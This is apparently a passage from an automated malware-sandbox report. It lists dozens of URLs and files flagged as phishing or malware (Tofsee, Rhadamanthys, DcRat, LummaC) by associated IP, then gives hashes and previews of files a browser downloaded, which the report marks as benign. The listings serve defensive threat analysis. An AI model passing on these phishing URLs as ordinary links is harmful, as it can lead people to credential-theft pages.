                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              static.nl3.vip.prod.criteo.netDocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://issuu.com/smart_media/docs/die_welt_wirtschaft/19Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Farahexperiences.com_Report_52288.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://ipfs.io/ipfs/bafybeidgkzr2gy7npe4yonk6p7s4chmwvgd2cp7bk7u6llfwiutgvt77tqGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://x3viswxo.clinicaimplantologica3d.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://www.ledger-secure03948.sssgva.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://wtm.entree-plat-dessert.com/r/eNpNj1uTojAQhX8N+6aYG4SHqS0VWHXB9Vbj4stUCAGDXJyQ6OKv38zbdPXDV+d096l+ugGEHqAuED7GiAhQAMooRDiABQc5LH3MCBXCBRQRF/vEzSHiXglnyKdF4RHEwAx6EAQ5w7aC0vVcQNze/WnerlrfBwfNHRjbZlybacuUFLxhUolpqazKjRxkJyxpprSYMDPJVc/7Rk4GZriYcKPUOOFWcuASYD/wCJyy4e6gmOmPVhTStA4KRaE/bIIDPdZab2E9bonJqrPus+F925pGy+8DQ28UF1/LnVZC3BumCzEMQukfBX/zy8terrvuDI76doov9WG1mh1q7Z19Ss3Yb45ZwoN2mR6jT/gv/zsm6EqiYVNXy/EQZy/jwEXrD3tCSLV+be2H/q7u9CuDFsPPMLvmyfr3fPt4l+v9Zb5vg67LCKw31zGsM/JK8GkbJBEGYeWd0hSI4hzT3QPXvyL5x95+7goVLhqqWHqoUVJ9xW00jWrQL3OSnld9f8tv7HEL/wMooptNGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://rs-stripe.hometalk.com/branding/?utm_source=contentstripe&ampGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://ogp.me/ns#Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 178.250.1.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ASN-APPNEXUShttps://1drv.ms/w/c/3e7c84f1a590a3e6/IQStDJr3bMEwQZDK5oU6uNI1AXa25ZxVanY0bWjgRrRk-d4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 185.89.210.20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 37.252.173.215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Remittance_Raveis.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 37.252.171.85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 185.89.210.244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://kendellseafoods.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 185.89.210.212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              DocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 185.89.210.82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://issuu.com/smart_media/docs/die_welt_wirtschaft/19Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 37.252.172.123
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://coisunibaseaiusignin.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 185.89.210.141
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://uppholldbcloginn.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 37.252.172.123
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              QUANTCASTUShttps://1drv.ms/w/c/3e7c84f1a590a3e6/IQStDJr3bMEwQZDK5oU6uNI1AXa25ZxVanY0bWjgRrRk-d4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://issuu.com/smart_media/docs/die_welt_wirtschaft/19Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.166
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://shaw-104901.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://swiftclaimairdropmeta.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://resetnowjunocarecentermaijunonew.square.site/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://x3viswxo.clinicaimplantologica3d.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://att-103454.square.site/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://pancakeswaplogin.educatorpages.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 91.228.74.159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              YAHOO-GQ1USphish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              DocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2IFYYPRUgO.exeGet hashmaliciousTofseeBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 67.195.228.111
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://nke.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 67.195.160.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://opm.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 74.6.160.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://jss.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 74.6.160.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              YAHOO-GQ1USphish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              DocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 98.137.11.164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2IFYYPRUgO.exeGet hashmaliciousTofseeBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 67.195.228.111
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://nke.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 67.195.160.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://opm.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 74.6.160.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              http://jss.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 74.6.160.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              28a2c9bd18a11de089ef85a160da29e4securedoc_20241008T101508.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              fBcMVl6ns6.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rpQF1aDIK4.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              test.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              path.ps1Get hashmaliciousDcRatBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Demande de proposition de AVANTAGE INDUSTRIEL INC.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://shorturl.at/yPmuH?sEBM=mt3zoN1OfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              77IyY7nCKB.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 4.175.87.197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4348), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.175097086994074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:3haIoq1mr8gYdYjeL+Pvq51pNAcllADTyBnmYCoqvpt4bIs:3uuA8gYSjeL+XI1pNZlls+CA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:681D57E9E7CBEF5DE44544C13F8CA62E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:65CFB6398D61FE7CAC86C90DC042095D8E3CD623
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF70829B2E58AFC016C35CE9A83E2BB60AD24D6341491686EE168EE71C40123F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2A131198DBB855882D7C7B687650B57133C4375FCEA4E4A86D338A78DCAEAFC18DC5477593429B6B1A599419F108F4BEBE7588BAE7C7831B5EA87D6C2BDF65C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-countdown"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=84796788&p=133799&s=0&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3759
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.907581191132203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:X3/7NZ3tz6NLvFwg0jCKC4P1cTiy8NOgoAH9SZOwb:X3zD3tz0vFwnWR4QiIA0Zvb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8634CEE42B68C501DA8D76BEEE00BF86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:346A50344174EC7C53CDD48080A55F7CD3A7C164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:890B9F9ED3F5AB8390B86F93B5B8BA0C2D5D50A5DC21668734B3537BC3A65F53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:405E62A3F1C24476041F90DDB5E50801693578A1B3E108919EDCDE05BB429BAD77FC60B0096ADBAA9A2704835EBD7DC165720AD0A14ADA9498B3234D361EF259
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/5426.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....vIDATx^.yX....3 ...}n=..Z.].Y.iN9#..8.8..."jjN(..*.9....(.29.u.PT....P......Al{...?.....Bi..Y{..=.i...G)..J..P...R.5.....l..`k(.[C)..J..P...R.5.B.0..0j..4c!.....f.$."....5......I.H.`......P2.!.F....i&.A.......~/..$....3Y.R....;z5kf...a.V..........(8FG..h.Z....0|s!.M.......`4......B..@4..M..._...~......nm@.....E...Q..Z..Y.:.Q;g..d.......Y.R..~x.hG-..J..p......$.$.E.@..#.s.0.<..Z.....HT.v..n.D..0TN?....RF.>....w.B......w...m...V...3./ .lB......x.....d5...>\..yk..Y.R..3.oj..5[.uG"Z......h.|...D.C'.u.Q|u...p...E._...|..R.Q-5...*7...3... .b..........~...y3>|....e..$B.'+Q)w.;...7hv4|J..Nm._w.....v.y..~..v.A3..ih...:..1.P..Q..._...#Q..!TO.C..0..........,..T..IB..b.6T .*.oE.{.I.M..`#....[.W...k.....zV+P..b..i...7.u.U.....k~...x8..m.I.Z.e..."..(&._..N8....H..c...(.~.D.G.P..!z'..+.Q.nT.N...lC.<..>w.f....o..;o.H.o6(...P,..4...3+.=._E.%..<..W'....v..8n=..;.E.i4.9.o.O.a.q.;B..../NG.V|4j^.NH>..7".\.J.....J.A..$.m.@..;P5w;*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=560843120&val=Gi5RlbZqo3p7d6lNFBY8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.654474309626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:hYxu3VHdyC/3KDVU4dtzSwVaRfmfY3fb32FA4Nbx8QL:hYElHMiKhHz+ia94Yvj2FA4NF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8B140F0F0F6E1A0F986CC7D6DFD74D65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E75B9E716E6DF29768EACFA27332F62144BDDA0C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AE57797F708333552A13BCD7293180163E6F38FD11B1A8CD5AA8F05421E5B8FA
